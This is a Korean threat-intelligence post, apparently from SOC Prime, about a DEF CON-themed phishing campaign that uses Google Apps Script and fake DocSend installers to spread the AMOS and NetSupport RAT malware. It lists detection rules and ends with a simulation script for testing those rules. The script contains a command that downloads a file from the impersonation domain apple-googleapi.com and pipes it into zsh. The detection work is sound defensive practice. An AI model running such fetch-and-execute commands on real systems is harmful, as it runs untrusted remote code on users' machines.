SOC Prime Bias: High

21 Aug 2026 16:11 UTC

DEF CON 테마의 피싱, Google Apps 스크립트를 악성 소프트웨어 배포에 악용

Author Photo
SOC Prime Team linkedin icon 팔로우
DEF CON 테마의 피싱, Google Apps 스크립트를 악성 소프트웨어 배포에 악용
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

위협 행위자가 소셜 엔지니어링을 통해 X(이전의 Twitter)에서 사이버 보안 컨퍼런스 참석자를 표적으로 삼아 무기화된 Google Docs와 사기성 DocSend 설치 프로그램을 사용하여 맬웨어를 배포하고 있습니다. 이 캠페인은 macOS 사용자에게는 AMOS 인포스틸러를 전달하고, Windows 피해자에게는 NetSupport RAT 및 Ledger 지갑 식물을 포함한 다단계 페이로드를 전달합니다. 이 공격은 Google Apps Script 사이드바와 ClickFix 스타일의 프롬프트를 악용하여 의심을 줄이고 악성 코드 실행을 유도합니다.

조사

Huntress 연구원은 CoinDesk 임원으로 가장하여 위협 행위자와 상호작용하여 전체 공격 체인을 관찰했습니다. 조사는 Google Apps Script, 도난당한 인증서로 서명된 가짜 설치 프로그램, Windows 로컬 TLS 인터셉팅 프록시를 포함한 정교한 다단계 프로세스를 밝혀냈습니다. 연구원들은 메모리에서 JavaScript를 실행하고 거짓 인증 기관을 배포하는 2차 단계도 파악했습니다.

완화

사용자는 터미널 명령 실행, Gatekeeper 우회, 문서 사이드바에서 수동 업데이트 설치와 같은 예기치 않은 요청을 의심해야 합니다. 조직은 비정상적인 Google Apps Script 활동 및 코드 서명 인증서의 무단 사용을 모니터링해야 합니다. 강력한 엔드포인트 제어와 문서 공유 링크의 독립적인 검증은 노출을 더욱 줄일 수 있습니다.

대응

악성 활동이 감지되면 데이터 유출이나 측면 이동을 막기 위해 영향을 받은 시스템을 즉시 격리해야 합니다. 대응자는 포렌식 증거를 보존하고 로컬 자격 증명 및 암호화폐 지갑 데이터를 손상된 것으로 간주하여 기기를 재이미징하는 것을 고려해야 합니다. 활성 세션을 취소하고, 비밀번호를 재설정하며, 시스템에 저장된 모든 API 키 또는 비밀을 회전해야 합니다.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

의심스러운 커맨드 앤 컨트롤 – 비정상적인 최상위 도메인(TLD) DNS 요청(through dns)

SOC 프라임 팀
2026년 8월 21일

의심스러운 Curl 실행 시도 [MacOS](through cmdline)

SOC 프라임 팀
2026년 8월 20일

짧은 스크립트 이름 사용에 의한 실행 가능성(through cmdline)

SOC 프라임 팀
2026년 8월 20일

Powershell에서 수상한 .NET 메소드를 호출함(through powershell)

SOC 프라임 팀
2026년 8월 20일

탐지할 IOCs (HashSha256): Google Doc Apps Script를 사용하여 맬웨어 배포하는 DEF CON 이후 피싱

SOC 프라임 AI 규칙
2026년 8월 20일

탐지할 IOCs (HashMd5): Google Doc Apps Script를 사용하여 맬웨어 배포하는 DEF CON 이후 피싱

SOC 프라임 AI 규칙
2026년 8월 20일

탐지할 IOCs (SourceIP): Google Doc Apps Script를 사용하여 맬웨어 배포하는 DEF CON 이후 피싱

SOC 프라임 AI 규칙
2026년 8월 20일

탐지할 IOCs (DestinationIP): Google Doc Apps Script를 사용하여 맬웨어 배포하는 DEF CON 이후 피싱

SOC 프라임 AI 규칙
2026년 8월 20일

트로이화된 DocSend 및 NetSupport RAT 배포 탐지 [Windows 프로세스 생성]

SOC 프라임 AI 규칙
2026년 8월 20일

macOS에서 잠재적인 악성 쉘 스크립트 실행 [Linux 프로세스 생성]

SOC 프라임 AI 규칙
2026년 8월 20일

악성 통신 및 페이로드 전달 탐지 [Windows 네트워크 연결]

SOC 프라임 AI 규칙
2026년 8월 20일

악성 PowerShell 스크립트 생성 및 실행 탐지 [Windows Powershell]

SOC 프라임 AI 규칙
2026년 8월 20일

## 시뮬레이션 실행

전제 조건: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적대 기술(TTP)의 정확한 실행을 설명합니다. 명령 및 내러티브는 식별된 TTP를 직접 반영하여 탐지 논리가 기대하는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예제는 오진을 초래할 수 있습니다.

  • 공격 내러티브 및 명령: 적군은 정당한 Google API 업데이트 프로세스로 가장하여 macOS 워크스테이션에 초기 접근을 시도합니다. 사용자에게 터미널에서 명령을 실행하도록 유도하는 소셜 공학 전술을 사용합니다. 이 명령은 curl 를 사용하여 apple-googleapi.com (유사 타이포스쿼팅/모양의 사칭 도메인)에서 페이로드를 가져와 출력 내용을 직접 zsh에 파이핑합니다. 이러한 “living-off-the-land” 방법은 네트워크 스트림에서 직접 코드를 실행함으로써 파일 시스템의 포렌식 흔적을 최소화하려고 시도합니다.

  • 회귀 테스트 스크립트:

    #!/bin/bash
    # "잠재적 악성 쉘 스크립트 실행" 규칙을 트리거하는 시뮬레이션 스크립트입니다.
    # 주: 규칙을 발동시키기 위해 'apple-googleapi.com'을 포함한 명령줄이 필요하지만, 실제 외부 호출을 피하기 위해 도메인 구조를 흉내내는 더미 URL을 사용합니다.
    
    echo "[*] 시뮬레이션 시작: 악성 쉘 파이핑 흉내 내기..."
    
    # 이 명령은 모든 조건을 만족시킵니다: 
    # 1. 프로세스가 zsh/sh/bash입니다 
    # 2. 'curl'을 포함합니다 
    # 3. '| zsh'를 포함합니다 
    # 4. 'apple-googleapi.com'을 포함합니다
    
    # 실제 페이로드 실행을 방지하면서 여전히 원격 측정을 생성하려면 존재하지 않는 URL을 사용합니다.
    curl -s http://apple-googleapi.com/update.sh | zsh
    
    echo "[*] 시뮬레이션 명령 전송 완료."
  • 정리 명령:

    # 공격 명령 자체로 디스크에 파일이 생성되지 않지만, 생성된 아티팩트가 있는 경우 제거해야 합니다.
    rm -f ~/Downloads/update.sh 2>/dev/null
    echo "[*] 정리 완료."